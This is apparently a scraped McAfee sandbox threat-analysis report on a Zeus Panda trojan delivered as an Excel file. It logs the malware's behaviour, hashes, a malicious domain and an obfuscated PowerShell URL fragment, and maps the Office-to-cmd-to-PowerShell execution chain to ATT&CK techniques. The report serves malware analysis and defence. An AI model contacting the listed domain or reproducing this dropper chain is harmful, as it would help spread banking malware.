HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 EvalationData
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 ILDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 MVID
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 MissingDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 NIDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 ConfigMask
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 ConfigString
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 EvalationData
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 ILDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 MVID
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 MissingDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 NIDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 ConfigMask
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 ConfigString
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 EvalationData
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 ILDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 MVID
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 MissingDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 NIDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 ConfigMask
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 ConfigString
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 EvalationData
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 ILDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 MVID
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 MissingDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 NIDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 ConfigMask
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 ConfigString
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 EvalationData
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 ILDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 MVID
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 MissingDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 NIDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 ConfigMask
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 ConfigString
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 EvalationData
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 ILDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 MVID
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 MissingDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 NIDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 ConfigMask
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 ConfigString
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 EvalationData
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 ILDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 MVID
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 MissingDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 NIDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 ConfigMask
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 ConfigString
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 EvalationData
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 ILDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 MVID
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 MissingDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 NIDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 ConfigMask
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 ConfigString
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 EvalationData
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 ILDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 MVID
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 MissingDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 NIDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 ConfigMask
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 ConfigString
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 EvalationData
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 ILDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 MVID
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 MissingDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 NIDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 ConfigMask
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 ConfigString
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 EvalationData
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 ILDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 MVID
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 MissingDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 NIDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 ConfigMask
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 ConfigString
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 EvalationData
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 ILDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 MVID
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 MissingDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 NIDependencies
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66 Status
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index127 ILUsageMask
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index127 NIUsageMask
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default Latest
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default LegacyPolicyTimeStamp
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default index17
HKLM\Software\Microsoft\PowerShell\1\PowerShellEngine ApplicationBase
HKLM\Software\Microsoft\Windows NT\CurrentVersion InstallationType
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options DevOverrideEnable
HKLM\System\CurrentControlSet\Control\Session Manager\Environment PSMODULEPATH
Process Created
Process Name Module
{00021401-0000-0000-C000-000000000046}
{1F3427C8-5C10-4210-AA03-2EE45287D668}
{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}
{2D3468C1-36A7-43B6-AC24-D3F02FD9607A}
{603D3801-BD81-11D0-A3A5-00C04FD706EC}
{660B90C8-73A9-4B58-8CAE-355B7F55341B}
{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}
{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}
{871C5380-42A0-1069-A2EA-08002B30309D}
{90AA3A4E-1CBA-4233-B8BB-535773D48449}
{A2A9545D-A0C2-42B4-9708-A0B2BADD77C8}
{DD313E04-FEFF-11D1-8ECD-0000F87A470C}
{F3364BA0-65B9-11CE-A9BA-00AA004AE837}
Process Opened
Process Name/Address PID/Process Name
Executed a shell
command
2yv4ezjzrwg.exe
Executed a shell
command
soqckmm9cu.exe
powershell.exe QueryInformation
Terminate & CreateThread & SetSessionID & VMOperation & VMRead & VMWrite & DupHandle &
powershell.exe
CreateProcess & SetQuota & SetInformation & QueryInformation
Process killed
Ended itself and all of its threads
Thread Created
71869a9f
718f8014
Other
Changed the protection attribute of process address: 0x71791fdc, new attribute: Execute_Read
Changed the protection attribute of process address: 0x71791fdc, new attribute: Execute_ReadWrite
Changed the protection attribute of process address: 0x71792be4, new attribute: Execute_ReadWrite
Decremented a thread's suspend count
Determined whether the specified process is running under WOW64
Disabled the DLL_THREAD_ATTACH and DLL_THREAD_DETACH notifications for the dynamic-link library
Enabled an application to supersede the top-level exception handler

Enum Process Name: armsvc.exe
Enum Process Name: audiodg.exe
Enum Process Name: cmd.exe
Enum Process Name: conhost.exe
Enum Process Name: csrss.exe
Enum Process Name: dwm.exe
Enum Process Name: excel.exe
Enum Process Name: explorer.exe
Enum Process Name: fxsction32.exe
Enum Process Name: lsass.exe
Enum Process Name: lsm.exe
Enum Process Name: mdm.exe
Enum Process Name: powershell.exe
Enum Process Name: sdclt.exe
Enum Process Name: services.exe
Enum Process Name: smss.exe
Enum Process Name: spoolsv.exe
Enum Process Name: svchost.exe
Enum Process Name: system
Enum Process Name: taskhost.exe
Enum Process Name: tlntsvr.exe
Enum Process Name: userinit.exe
Enum Process Name: wininit.exe
Enum Process Name: winlogon.exe
Enum Process Name: wmiprvse.exe
Enum Process Name: wsqmcons.exe
Initialized COM library for the current thread and set it in the concurrency mode
Obtained the identifier of the thread or process that created the specified window
Obtained the priority value for a thread
Opened the access token associated with a process
Opened the access token associated with a thread
Retrieved system information
Set a waiting mode until a specified object is in the signaled state or the time-out interval elapses
Set the priority value for a thread
Network Operations: 8
DNS Queries
Obtained network parameters for the local computer
Translated a host name INTELIIL.FAITH into an IP address
Translated a host name WPAD into an IP address
Socket Activities
8.8.8.9
Closed the socket
Controlled the I/O mode of the newly created socket
Initiated WS2_32 socket DLL
Terminated use of the Winsock DLL
Other Operations: 14
Signal Objects
Mutex-Object Name
Opened an existing named event object
global\.net clr networking
global\cordbipcsetupsyncevent_1160
global\cordbipcsetupsyncevent_2308
Others
Allocated and initialized a security identifier (SID)
Converted a string-format security descriptor into a valid, functional security descriptor
Determined whether a specified security identifier (SID) is enabled in an access token
Enabled/disabled privileges in an access token
Expanded environment-variable strings and replace them with the values defined for the current use
Initialized a new security descriptor
Obtained information about an access token
Recorded system information
Retrieved the user's logon name
Set information in a security discretionary access control list (DACL)
McAfee Active Response
Status: Product is not Available
© 2020 McAfee, LLC. All rights reserved.

© 2020 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.

Threat Analysis Report: ZEUS - PANDA

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Threat Analysis Report: ZEUS - PANDA

Uploaded by

Copyright:

Available Formats

McAfee Advanced Threat Defense

| Threat Analysis Report

File Name ZEUS_PANDA.xls Threat Level ⬤ 5 - Very High

Malware Name TYPE_TROJAN Engine GTI File Reputation

File Submitted 2021-04-13 01:35:06 UTC Processing Time 194 seconds

File Size 48,640 bytes Sandbox Replication 180 seconds

Show More Hash Values File Details Environment

MD5 Hash Identifier 4DAD700BEE9467DB3C94D6D4DB648502

SHA-1 Hash Identifier 7277E65AA182D423A6038C787B19E21C18B36B4E

Hide hash values

File Type 0 2010

Hide file details

Windows® Internet Explorer version: 8.0.7601.17514

Microsoft Office version: 2007

PDF Reader version: 11.0

No Flash player installed

Flash player plugin version: 22.0.0.209

Platform Version 4.12.0.7

Detection Package Version 4.12.0.201112

Hiding, Camouflage, Stealthiness, Detection and Removal Protection ⬤ 5 - Very High

Spawned Powershell Process from Office application ⬤ 5 - Very High

Set a filter function to supersede the top-level exception handler ( ⬤ 1-

Spreading ⬤ 5 - Very High

Non-PE sample executed active content by shell application ⬤ 5 - Very High

Exploiting, Shellcode ⬤ 5 - Very High

Non-PE sample executed active content by shell application ⬤ 5 - Very High

Detected scripting content embedded in the sample ⬤ 2 - Low

Networking ⬤ 5 - Very High

Non-PE sample executed active content by shell application ⬤ 5 - Very High

Set a filter function to supersede the top-level exception handler ( ⬤ 1-

Updated security descriptor for newly created process ⬤ 2 - Low

Ran Powershell without an interactive shell ⬤ 2 - Low

Created named mutex object ⬤ 2 - Low

Set a filter function to supersede the top-level exception handler ( ⬤ 1-

Retrieved system information such as Processor Architecture,Number ⬤ 1-

Disabled attach/detach notifications from dynamic link library ⬤ 1-

Data spying, Sniffing, Keylogging, Ebanking Fraud ⬤ 2 - Low

Set hook procedure to control system activities ⬤ 2 - Low

Persistence, Installation Boot Survival ⬤ 1 - Informational

GTI Web/URL Reputation

URL Port Reputation Category Name Risk Group Functional Group

INTELIIL.FAITH 80 High Risk Malicious Sites Security Risk/Fraud/Crime

INTELIIL.FAITH/MESE'+$FOS+$MO+$UY+$JI+$OE+$FD+$JIK+$NAW+$MO+$UY+$JI+$OE 80 High Risk Malicious Sites Security Risk/Fraud/Crime

Name Reason Severity

ZEUS_PANDA.xls loaded by MATD Analyzer ⬤ 5 - Very High

cmd.exe executed & loaded by excel ⬤ 5 - Very High

powershell.exe executed by cmd.exe ⬤ 5 - Very High

Processes Files Registry Operations Network Operations Multiple Operations

Jump to Timeline Details

Techniques Observed (MITRE ATT&CK™ Matrix)

Execution through API Execution

Spawned Powershell Process from Office application ⬤ 5 - Very High

PowerShell is a powerful interactive command-line interface and scripting environment

Spawned Powershell Process from Office application ⬤ 5 - Very High

Ran Powershell without an interactive shell ⬤ 2 - Low

User Execution Execution

Offile file contains VBA code ⬤ 1 - Very Low

Scripting Execution, Defense Evasion

Non-PE sample executed active content by shell

Detected scripting content embedded in the sample ⬤ 2 - Low

Hooking Persistence, Privilege Escalation, Credential Access

Windows processes often leverage application programming interface (API) functions to

Set hook procedure to control system activities ⬤ 2 - Low